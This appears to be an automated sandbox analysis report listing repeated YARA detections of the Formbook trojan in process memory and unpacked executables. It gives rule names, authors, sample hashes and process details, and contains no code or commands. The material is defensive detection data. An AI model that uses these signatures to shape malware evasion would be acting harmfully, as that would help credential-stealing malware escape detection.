Source: 00000005.00000000.300799185.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000000.300799185.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.300799185.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000000.433242777.000000000D48F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000014.00000000.433242777.000000000D48F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000000.433242777.000000000D48F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.300389282.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000000.300389282.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.300389282.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000000.333596734.0000000003C01000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000000.333596734.0000000003C01000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000000.333596734.0000000003C01000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001E.00000002.537830907.00000000034D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001E.00000002.537830907.00000000034D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001E.00000002.537830907.00000000034D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.308846513.0000000003A5C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.308846513.0000000003A5C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.308846513.0000000003A5C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001E.00000002.532023661.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001E.00000002.532023661.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001E.00000002.532023661.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: 1a#U00bb.exe PID: 6128, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: cmd.exe PID: 5692, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: Djfypqyfx.exe PID: 5068, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: Djfypqyfx.exe PID: 5460, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: wscript.exe PID: 1428, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: 1a#U00bb.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.299959844.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000000.299959844.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.299959844.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.479329024.0000000003210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.479329024.0000000003210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.479329024.0000000003210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000000.460422107.000000000D48F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000014.00000000.460422107.000000000D48F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000000.460422107.000000000D48F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.381193910.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000F.00000002.381193910.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.381193910.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.309895318.0000000003FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.309895318.0000000003FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.309895318.0000000003FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001E.00000002.537026751.00000000034A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001E.00000002.537026751.00000000034A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001E.00000002.537026751.00000000034A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.380920246.0000000003AD9000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000F.00000002.380920246.0000000003AD9000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.380920246.0000000003AD9000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.488703408.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.488703408.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.488703408.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.301342863.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000000.301342863.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.301342863.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.479803163.0000000003470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.479803163.0000000003470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.479803163.0000000003470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.300799185.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
